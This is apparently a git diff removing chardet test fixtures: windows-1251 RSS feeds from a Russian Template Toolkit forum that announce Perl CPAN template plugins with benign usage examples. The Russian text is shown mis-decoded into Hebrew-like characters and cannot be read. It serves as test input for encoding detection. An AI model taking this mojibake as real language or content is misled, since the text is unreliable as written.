ןמהןטסךף םא םמגו עול, מעךנעו ג פמנףלאץ.<br /><br />ֲ םאסעמשטי למלוםע המסעףןם סכוהף‏שטו ןמהןטסךט <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_1.rdf">ַםאךמלסעגמ ס Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_6.rdf">ֽמגמסעט Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_4.rdf">־בסףזהוםטו פמנףלא</a>.<br /><br />ִכ מעסכוזטגאםט םמגץ עול ט קעוםט חאדמכמגךמג למזםמ טסןמכחמגאע סןוצטאכםו ןנמדנאלל ט סכףזב, םאןנטלונ: <a target="_blank" href="http://www.activerefresh.com/">Abilon</a>, <a target="_blank" href="http://www.feedreader.com/">FeedReader</a>, <a target="_blank" href="http://www.yole.ru/projects/syndirella/">Syndirella</a>, <a target="_blank" href="http://blogspace.com/rss/readers">RSS Readers</a>, <a target="_blank" href="http://www.watznew.com/">WatzNew</a>.<br /><br />ֿמכחמגאעוכט בנמףחונא <span style="font-weight:bold"><span style="color: orange">Firefox</span></span> (גונסטט 0.8 ט סעאנרו) עאךזו למדףע םאסענמטע ןמהןטסךף קונוח <span style="font-weight:bold">Live Bookmark</span>. ִכ ‎עמדמ םףזםמ חאיעט ג גבנאםםי פמנףל (םאןנטלונ, <a target="_blank" href="http://forum.template-toolkit.ru/view_forum/forum_id-6.html">ֽמגמסעט Template Toolkit</a>). ֲ םטזםול ןנאגמל ףדכף בנמףחונא ןמגטעס חםאקמך <img src="http://forum.template-toolkit.ru/attachments/000/138/138/rdf.gif" alt="RDF" />. ִמסעאעמקםמ שוכךםףע ןמ חםאקךף ט המבאגטע ןמהןטסךף ג חאךכאהךט. ֿמסכו ‎עמדמ ג חאךכאהךאץ ןמגטעס ןאןךא &quot;ֽמגמסעט Template Toolkit&quot;, ג ךמעמנמי ןונטמהטקוסךט בףהףע מבםמגכעס חאדמכמגךט םמגץ עול ג פמנףלו &quot;ֽמגמסעט Template Toolkit&quot;. - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-40.html - ־בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - Wed, 21 Jul 2004 14:52:30 GMT - ןמהןטס [ֳמסע] - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - ׳עמ-עמ םו סמגסול ןמםעםמו עגמנטעס.<br /> -ּום נאסןמחםאוע סטסעולא ךאך Light Elf, םמ למט סממבשוםט ןמלוקא‏עס םאהןטס‏ [ֳמסע].<br /> -<br /> -עמ עאך םאהמ? - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-8.html - ־בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - Tue, 20 Jul 2004 15:02:45 GMT - ֿנמבוכ ג סממבשוםטץ - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - ֵסע ןנוהכמזוםטו םו ףהאכע ןנמבוכ.<br /> -ס טץ ןמלמש‏ ףהמבםמ פמנלאעטנמגאע עוךסע.<br /> -־סמבוםםמ ךמה. - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-7.html - ־בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - Wed, 14 Jul 2004 06:13:38 GMT - ִגטזמך פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - םו סמגסול ןמםכ. <br /> -לבכולךא סגונץף &quot;powered by [%TT2%]&quot; מחםאקאוע קעמ ‎עמע פמנףל סהוכאם םא TT2? - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-4.html - ־בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - Mon, 12 Jul 2004 04:25:44 GMT - װמנףל מעךנע - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - 12 ט‏כ 2004 דמהא מעךנכטס <span style="font-weight:bold">פמנףל Template Toolkit</span>. ֿנטדכארא‏ גסוץ טםעונוסף‏שטץס ט טסןמכחף‏שטץ ג נאבמעו בטבכטמעוךף Template Toolkit ך ףקאסעט‏.<br /><br />ּמט בכאדמהאנםמסעט:<br /><br />ִלטענט‏ ֽטךמכאוגף חא ןמההונזךף, נאססכךף קונוח ןמהןטסךף Subscribe.Ru סעאעט מ Template Toolkit, ןנוהמסעאגכוםטו פמנףלא <a target="_blank" href="http://perl.dp.ua/cgi-bin/forum.pl?do=show&tema=1&page=1">Perl - ַאץמהט ט ףקטס</a> ג ךאקוסעגו פמנףלא ןמההונזךט סאיעא <a target="_blank" href="http://www.template-toolkit.ru/">Template Toolkit (נףססךא נוהאךצט)</a>.<br /><br />ֲאהטלף ׁףץאםמגף חא ןמההונזךף ט טהו‏ סמחהאםט ‎עטץ פמנףלמג.<br /><br />ֽאהו‏ס, קעמ פמנףל סעאםףע ןמכוחםלט הכ עוץ, ךעמ טסןמכחףוע טכט סמבטנאועס טסןמכחמגאע ג סגמטץ נאחנאבמעךאץ בטבכטמעוךף ןמ נאבמעו ס ראבכמםאלט Template Toolkit. ׁןנארטגאיעו, הוכטעוס, מבסףזהאיעו.<br /><br /><span style="font-weight:bold">ׁענףךעףנא פמנףלא ןנוהגאנטעוכםא</span>. דמעמג גסכףראע ט ףקוסע גסו ןנוהכמזוםט ןמ סמחהאםט‏ םמגץ גועמך ג נאלךאץ פמנףלמג Template Toolkit.<br /><br />ׁאל פמנףל םאןטסאם ס טסןמכחמגאםטול Template Toolkit ט בףהוע המנאבאעגאעס. ֲסו חאלוקאםט ט ןנוהכמזוםט ןנטגועסעגף‏עס. - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-1.html - ־בסףזהוםטו פמנףלא - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - - - diff --git a/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.6.xml b/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.6.xml deleted file mode 100644 index e753038..0000000 --- a/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.6.xml +++ /dev/null @@ -1,486 +0,0 @@ - - - - - װמנףל Template Toolkit : ֽמגמסעט Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-6.html?rss - Template Toolkit - בסענא, למשםא ט נאסרטנולא סטסעולא מבנאבמעךט ראבכמםמג. ֽא סאיעו נאבמעאוע פמנףל, ג ךמעמנמל מבסףזהא‏עס גמןנמס טסןמכחמגאםט בטבכטמעוךט ןמ נאבמעו ס ראבכמםאלט. ְםמםס ט םמגמסעט, סגחאםםו ס Template Toolkit. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 26 Dec 2005 16:28:41 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ראבכמם ג perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - Mon, 19 Dec 2005 14:49:49 GMT - Template::Provider::FromDATA - חאדנףחךא ראבכמםמג טח סוךצטט __DATA__ - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - ֽא CPAN מןףבכטךמגאםא גונסט 0.04 <a target="_blank" href="http://search.cpan.org/~bricas/Template-Provider-FromDATA/">למהףכ Template::Provider::FromDATA</a>, ךמעמני ןמחגמכוע ץנאםטע ראבכמם גלוסעו ס ךמהמל ג מהםמל פאיכו (סוךצט __DATA__).<br /><br />ִכ טסןמכחמגאםט האםםמדמ למהףכ םומבץמהטלמ גםאקאכו סמחהאע ‎ךחולןכנ ןנמגאיהונא Template::Provider::FromDATA, א חאעול ףךאחאע ודמ ג ךאקוסעגו ןמסעאגשטךא ראבכמםמג ג ךמםסענףךעמנו Template:<br /><br /><div class="code"><pre>use Template; -use Template::Provider::FromDATA; - -# ׁמחהא¸ל מבתוךע ןמסעאגשטךא -my $provider = Template::Provider::FromDATA-&gt;new( { - CLASSES =&gt; __PACKAGE__ -} ); - -# ׃ךאחגאול מבתוךע ןמסעאגשטךא ג מןצט ךמםסענףךעמנא Template -my $template = Template-&gt;new( { - # ... - LOAD_TEMPLATES =&gt; [ $provider ] -} ); - -# ...סאלט ראבכמם ג סוךצטט __DATA__ - -__DATA__ - -__mytemplate__ -Foo [% bar %] - -__myothertemplate__ -Baz, [% qux %]?</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-122.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - Mon, 19 Dec 2005 14:10:59 GMT - Template::Plugin::HTML::Strip - ףהאכוםטו HTML-עודמג טח עוךסעא - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - ֽא CPAN מןףבכטךמגאםא גונסט 0.01 למהףכ <a target="_blank" href="http://search.cpan.org/~gsimmons/Template-Plugin-HTML-Strip/">למהףכ Template::Plugin::HTML::Strip</a>. ּמהףכ ןנוהמסעאגכוע ןכאדטם, ךמעמני ןמחגמכוע ףהאכע טח עוךסעא HTML-עודט.<br /><br /><div class="code"><pre>[% USE HTML.Strip %] - -[% FILTER html_strip %] -&lt;title&gt;People for the Preservation of Presentational Markup&lt;/title&gt; -&lt;h1&gt;HTML::Strip - A cause for concern?&lt;/h1&gt; -[% END %] - -[% USE HTML.Strip 'strip' - striptags = [ 'script' 'iframe' ] - emit_spaces = 0 -%] - -[% FILTER strip %] -&lt;p&gt;A call to arms against the removal of our elements!&lt;/p&gt; -[% END %]</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-121.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - Sun, 6 Nov 2005 08:46:17 GMT - Template::Plugin::Subst - חאלוםא עוךסעא ס ןמלמש‏ נודףכנםץ גנאזוםטי - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - ֽא CPAN מןףבכטךמגאם <a target="_blank" href="http://search.cpan.org/~nikc/Template-Plugin-Subst/">למהףכ Template::Plugin::Subst</a>, ךמעמני ןמחגמכוע גןמכםע חאלום ג עוךסעו ס טסןמכחמגאםטול נודףכנםץ גנאזוםטי.<br /><br />ָסןמכחמגאםטו גטנעףאכםמדמ לועמהא <span style="font-weight:bold">subst</span><br /><div class="code"><pre>[% USE Subst %] -[% str = 'רטכמ םא לכמ' %] -[% str.subst('(רטכמ|לכמ) םא (לכמ|רטכמ)', '$2 םא $1', 1) %]</pre></div><br /><br />ָסןמכחמגאםטו פטכענא<br /><div class="code"><pre>[% USE filt = Subst - pattern = '(רטכמ|לכמ) םא (לכמ|רטכמ)' - replacement = '$2 םא $1' - global = 1 %] -[% FILTER $filt %] -רטכמ םא לכמ -[% END %]</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-115.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - Sat, 1 Oct 2005 06:52:16 GMT - Template::Plugin::ASCIITable - גגמה עוךסעמגץ עאבכטצ - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - ֽא CPAN מןףבכטךמגאםא גונסט 0.1 <a target="_blank" href="http://search.cpan.org/~dakkar/Template-Plugin-ASCIITable/">למהףכ Template::Plugin::ASCIITable</a>, ךמעמני ןמחגמכוע נטסמגאע עוךסעמגו עאבכטצ.<br /><br /><div class="code"><pre>[% - USE ASCIITable; - ASCIITable.cols('a', 'b', 'c'); - ASCIITable.rows([1,2,3],['one','two','three']); - ASCIITable.draw() -%]</pre></div><br />ֲגמה:<br /><br /><div class="code"><pre> -.=----+-----+------=. -| a | b | c | -|=----+-----+------=| -| 1 | 2 | 3 | -| one | two | three | -'=----+-----+------='</pre></div><br /><br />ֿכאדטם ןמחגמכוע םאסענאטגאע ןאנאלוענ עאבכטצ, א עאךזו סמחהאגאע סמבסעגוםםו סעטכט נאלמך. - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-111.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - Thu, 21 Jul 2005 05:47:32 GMT - Template::Plugin::Perl - ‎ךסןמנע נהא פףםךצטי Perl ג ראבכמם - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - ֽא CPAN מןףבכטךמגאם <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-Perl/">למהףכ Template::Plugin::Perl</a>, ןנוהמסעאגכ‏שטי נה ןמכוחםץ פףםךצטי Perl.<br /><br /><div class="code"><pre>[% USE Perl %] -[% Perl.log(100) %] -[% Perl.rand(1) %] -[% Perl.exp(2) %] -[% Perl.sprintf(&quot;%.0f&quot;, 3.5) %] -[% Perl.pow(2, 3) %] # 2 ** 3; -[% Perl.eval('2**3') %] -[% Perl.sin(3.14) %] -[% Perl.cos(0) %] -[% Perl.join(',', 'a', 'b', 'c') %] -[% list = ['a','b','c']; - Perl.join(',' list) %]</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-102.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - Thu, 21 Jul 2005 04:37:32 GMT - Template::Plugin::POSIX - POSIX פףםךצטט ג ראבכמםאץ - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - ֽא CPAN מןףבכטךמגאם <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-POSIX/">למהףכ Template::Plugin::POSIX</a>. ּמהףכ ןמחגמכוע טסןמכחמגאע ג ראבכמםאץ פףםךצטט POSIX.<br /><br /><div class="code"><pre>[% USE POSIX %] -[% POSIX.log(100) %] -[% POSIX.rand(1) %] -[% POSIX.exp(2) %] -[% POSIX.sprintf(&quot;%.0f&quot;, 3.5) %] -[% POSIX.pow(2, 3) %] -[% POSIX.ceil(3.8) %] -[% POSIX.floor(3.8) %] -[% POSIX.sin(3.14) %] -[% POSIX.cos(0) %]</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-101.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - Mon, 11 Jul 2005 04:05:37 GMT - Template::Plugin::Decode - ןנומבנאחמגאםטו גגמהא ג Unicode - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - ֽא CPAN מןףבכטךמגאם <a target="_blank" href="http://search.cpan.org/~lyokato/Template-Plugin-Decode/">למהףכ Template::Plugin::Decode</a>, ךמעמני ןנוהמסעאגכוע סןמסמב ןנומהמכוע סכמזםמסעט ס טסןמכחמגאםטול ג ראבכמםאץ UTF-8.<br /><br /><div class="code"><pre>ֲםאקאכו [% USE Decode %]. -ַאעול למזםמ טסןמכחמגאע פטכענ 'decode'. -עמע פטכענ ןנומבנאחףוע סענמךף טח UTF-8 גמ גםףענוםםטי unicode-פמנלאע Perl: -[% multibyte_str | decode %]</pre></div><br />ְגעמנ למהףכ ןנוהכאדאוע סכוהף‏שטי ןמהץמה. ֲ ךאקוסעגו ךמהטנמגךט ראבכמםמג טסןמכחףועס UTF-8. װאיכ המכזם סמהונזאע BOM-חאןטס. ֲסו גץמהםו האםםו הוךמהטנף‏עס פטכענמל decode. - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-96.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - Sat, 2 Jul 2005 06:41:54 GMT - Template::Plugin::XSLT - XSLT-ןנומבנאחמגאםטו XML - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - ֽא CPAN מןףבכטךמגאםא גונסט 1.2 <a target="_blank" href="http://search.cpan.org/~scott/Template-Plugin-XSLT/">למהףכ Template::Plugin::XSLT</a>, ג ךמעמנמל נואכטחמגאם פטכענ, ןמחגמכ‏שטי ןנמטחגמהטע XSLT-ןנומבנאחמגאםט פנאדלוםעא XML.<br /><br /><div class="code"><pre>[% USE transform = XSLT(&quot;stylesheet.xsl&quot;); %] - ... -[% foo.as_xml | $transform foo = '&quot;bar&quot;' baz = 123 %]</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-94.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - Tue, 24 May 2005 11:28:04 GMT - Template::Plugin::NakedBody - גהוכוםטו BODY-סמסעאגכ‏שוי HTML-המךףלוםעא - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - ֽא CPAN מןףבכטךמגאםא גונסט 0.02 <a target="_blank" href="http://search.cpan.org/~adamk/Template-Plugin-NakedBody/">למהףכ Template::Plugin::NakedBody</a>. ִאםםי למהףכ נואכטחףוע פטכענ, ךמעמני גהוכוע סמהונזטלמו HTML-המךףלוםעא לוזהף עודאלט &lt;BODY&gt; ט &lt;/BODY&gt;. אך םאןטסאםמ ג המךףלוםעאצטט ‎עמ מךאחגאועס ףהמבםמ ןנט נאבמעו ס הטחאיםונאלט. ֿנט גךכ‏קוםטט ןמהדמעמגכוםםץ טלט המךףלוםעמג םוע םומבץמהטלמסעט המןמכםטעוכםמ נוהאךעטנמגאע המךףלוםע.<br /><br /><div class="code"><pre># included.html -# ֲ html-נוהאךעמנו ףהמבםמ נאבמעאע ס ןמכםל המךףלוםעמל -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -׳עמב גטהוע ןנאגטכםמ ‎עמע ךמםעוםע םףזם עאבכטצ סעטכוי. -&lt;/body&gt; -&lt;/html&gt; - -# mypage.html -[% USE NakedBody %] -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -מםעוםע טסץמהםמדמ המךףלוםעא. -ַאעול גךכ‏קאועס המךףלוםע, ןמהדמעמגכוםםי הטחאיםונמל. -[% INCLUDE included.html | NakedBody %] -ֿנמהמכזוםטו טסץמהםמדמ המךףלוםעא. -&lt;/body&gt; -&lt;/html&gt;</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-88.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - Sat, 21 May 2005 08:04:46 GMT - CGI::Application::Plugin::AnyTemplate - טםעונפויס ך מסםמגםל סטסעולאל ראבכמםמג - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - ֽא CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/M/MG/MGRAHAM/CGI-Application-Plugin-AnyTemplate-0.04.tar.gz">גונסט 0.04 למהףכ CGI::Application::Plugin::AnyTemplate</a>. ִאםםי למהףכ סמהונזטע מבמבשוםםי טםעונפויס הכ נאבמע ס כ‏במי טחגוסעםמי סטסעולמי ראבכמםמג Perl (ג םאסעמשטי למלוםע ןמההונזטגא‏עס <span style="font-weight:bold">HTML::Template</span>, <span style="font-weight:bold">HTML::Template::Expr</span>, <span style="font-weight:bold">Petal</span> ט <span style="font-weight:bold">Template Toolkit</span>) טח ןנטכמזוםטי, טסןמכחף‏שטץ ג ךאקוסעגו ךמםענמככונא CGI::Application. - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-87.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - Sun, 15 May 2005 14:37:34 GMT - Inline::TT - גךכ‏קוםטו ראבכמםמג ג סךנטןע - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - ֽא CPAN מןףבכטךמגאםא גונסט 0.04 <a target="_blank" href="http://search.cpan.org/~philcrow/Inline-TT/">למהףכ Inline::TT</a>, ךמעמני ןמחגמכוע גךכ‏קאע ראבכמם ג סךנטןע ס סמץנאםוםטול גמחלמזםמסעט ךורטנמגאםט מעךמלןטכטנמגאםםץ ראבכמםמג.<br /><br /><div class="code"><pre> -use Inline TT =&gt; 'DATA'; - -# טלוםא בכמךמג ‎ךסןמנעטנף‏עס ךאך פףםךצטט -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;; - -__DATA__ -__TT__ -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %]</pre></div><br /><div class="code"><pre>use Inline TT =&gt; &lt;&lt; EO_TEMPLATE -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %] -EO_TEMPLATE - -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;;</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-84.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - Sat, 7 May 2005 12:41:26 GMT - Template::Plugin::HTML::Prototype - דוםונאצט Ajax-ךמהא ג ראבכמםאץ - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - ֽא CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/B/BA/BAUERB/Template-Plugin-HTML-Prototype-0.01.tar.gz">גונסט 0.01 למהףכ Template::Plugin::HTML::Prototype</a>. ִאםםי למהףכ ןנוהמסעאגכוע טםעונפויס ך למהףכ‏ HTML::Prototype, ךמעמני סמהונזטע פףםךצטט הכ דוםונאצטט ךמהא <a target="_blank" href="http://prototype.conio.net/">Javascript-בטבכטמעוךט Prototype</a>. Prototype טסןמכחףועס ג קאסעםמסעט ג <span style="font-weight:bold">Ruby on Rails</span> ט סמהונזטע מבתוךעםמ-מנטוםעטנמגאםםף‏ נואכטחאצט‏ <span style="font-weight:bold">Ajax</span>.<br /><br /><div class="code"><pre> [% USE proto = HTML::Prototype %] - - [% proto.define_javascript_functions %] - [% proto.form_remote_tag(...) %] - [% proto.link_to_function(...) %] - [% proto.link_to_remote(...) %] - [% proto.observe_field(...) %] - [% proto.observe_form(...) %] - [% proto.periodically_call_remote(...) %] - [% proto.submit_to_remote(...) %]</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-81.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - Tue, 12 Apr 2005 12:23:30 GMT - Template::Multilingual - ןמההונזךא םוסךמכךטץ חךמג ג ראבכמםאץ - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - ֽא CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CH/CHOLET/Template-Multilingual-0.02.tar.gz">גונסט 0.02 למהףכ Template::Multilingual</a>. עמע למהףכ גכועס ןנמטחגמהםל מע Template ט ןנוהכאדאוע נואכטחאצט‏ ןמההונזךט םוסךמכךטץ חךמג ג ראבכמםאץ.<br /><br />מה:<br /><div class="code"><pre>use Template::Multilingual; -my $template = Template::Multilingual-&gt;new(); -$template-&gt;language('en'); -$template-&gt;process('example.ttml');</pre></div><br />״אבכמם:<br /><div class="code"><pre> -&lt;t&gt; - &lt;en&gt;Hello!&lt;/en&gt; - &lt;fr&gt;Bonjour!&lt;/fr&gt; - &lt;ru&gt;ֿנטגוע!&lt;/ru&gt; -&lt;/t&gt;</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-75.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - Mon, 4 Apr 2005 06:03:55 GMT - Template::Plugin::TagRescue - ןכאדטם הכ גהוכוםט עודמג html ס טסךכ‏קוםטול - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - ־ןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-TagRescue-0.06.tar.gz">גונסט 0.06 למהףכ Template::Plugin::TagRescue</a>. ּמהףכ גהוכוע ןנט גגמהו (ע.ו. חאלוםוע &lt; &gt; &amp; &quot; םא סממעגועסגף‏שטו entities) עודט html חא טסךכ‏קוםטול ףךאחאםםץ.<br /><br /><div class="code"><pre>[% USE TagRescue %] - -[% FILTER html_except_for('b') -%] -&lt;B&gt;ֶטנםי!&lt;/B&gt; and &lt;I&gt;ףנסטג!&lt;/I&gt;&lt;BR&gt; -[%- END %] - -# ֲגמה: -# &lt;B&gt;ֶטנםי!&lt;/B&gt; and &amp;lt;I&amp;gt;Italic!&amp;lt;/I&amp;gt;&amp;lt;BR&amp;gt; - -[% '&lt;B&gt;ֶטנםי!&lt;/B&gt; and &lt;I&gt;ףנסטג!&lt;/I&gt;&lt;BR&gt;' | html_except_for('i','br') %] - -# ֲגמה: -# &amp;lt;B&amp;gt;Bold!&amp;lt;/B&amp;gt; and &lt;I&gt;Italic!&lt;/I&gt;&lt;BR&gt; - -[% taglist = ['b', 'br']; '&lt;B&gt;ֶטנםי!&lt;/B&gt; ט &lt;I&gt;ףנסטג!&lt;/I&gt;&lt;BR&gt;' | html_except_for(taglist) %] - -# ֲגמה: -# &lt;B&gt;ֶטנםי!&lt;/B&gt; ט &amp;lt;I&amp;gt;ףנסטג!&amp;lt;/I&amp;gt;&lt;BR&gt;</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-74.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - Tue, 29 Mar 2005 12:46:04 GMT - Template::Plugin::HTML::BBCode - ןנומבנאחמגאםטו BBCode ג HTML - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - ֽא CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/L/LI/LIOL/Template-Plugin-HTML-BBCode-0.01.tar.gz">גונסט 0.01 למהףכ Template::Plugin::HTML::BBCode</a>. ּמהףכ גכועס מבונעךמי גמךנףד למהףכ HTML::BBCode ט ןנוהמסעאגכוע פטכענ bbcode, ךמעמני חאלוםוע עודט נאחלועךט BBCode םא סממעגועסגעף‏שטו עודט HTML.<br /><br /><div class="code"><pre>[%- USE HTML::BBCode -%] -[% FILTER bbcode %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %] - -[%- USE HTML::BBCode( 'bbcode_limited' - allowed_tags = [ 'b', 'i', 'u' ] -) -%] -[% FILTER bbcode_limited %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %]</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - 